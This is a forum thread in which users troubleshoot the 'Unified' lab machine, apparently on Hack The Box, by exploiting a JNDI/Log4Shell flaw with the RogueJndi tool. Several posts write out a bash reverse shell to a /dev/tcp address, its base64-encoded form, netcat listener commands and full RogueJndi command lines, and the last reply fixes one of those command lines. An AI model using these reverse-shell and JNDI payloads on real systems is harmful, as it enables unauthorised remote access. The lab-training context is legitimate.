Hello, I have been trying to get Pawn the Unified machine all goes well until getting to the ncat listening on port 4444. Ran the following command without an issue
$ echo ‘bash -c bash -i >&/dev/tcp/10.10.14.27/4444 0>&1’ | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjcvNDQ0NCAwPiYxCg==
RogueJndi works and the payload get sent and Jndi gets the request but nothing shows on ncat I’ve tried everything I know please help.
Thanks
Hi,
was facing similar issues - I don’t know your setup, but for me within a kali vanilla installation, I ran:
sudo nc -nlvp 4444 instead of just nc -nlvp 4444.
No clue why I had to use sudo 
Still #worthatry
Thanks for the suggestion I will give it a try.
[I know older post, but answering for future referencing]
I struggled at the same point: no shell spawning, but rogueJndi registering the payload.
In my case, the hard-to-spot issue was very likely a line break in one of the commands which I had copied over from blogposts before adjusting. You can check in an editor if that might be the case.
@TheConcierge using sudo with nmap should only be required for lower ports from 0-1024 . If you have used one of these, that could be the answer to your wondering, but for 4444 this shouldn’t have made a difference…
Try changing the starting point vpn you are using. (worked for me). Either that or what until the VIP that HTB assigned you expires/changes.
Hi! I have the same problem as NeoMatrix1217, I have tried everything but cant get the netcat to spawn the shell. I have made sure there are no breaks or spaces in the shell:
java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “10.10.15.123”
Please if anybody has a suggestion it will be very much appreciatted.
Thanks!
java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “10.10.15.123”
You have to remove BASE64, i.e:
java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “10.10.15.123”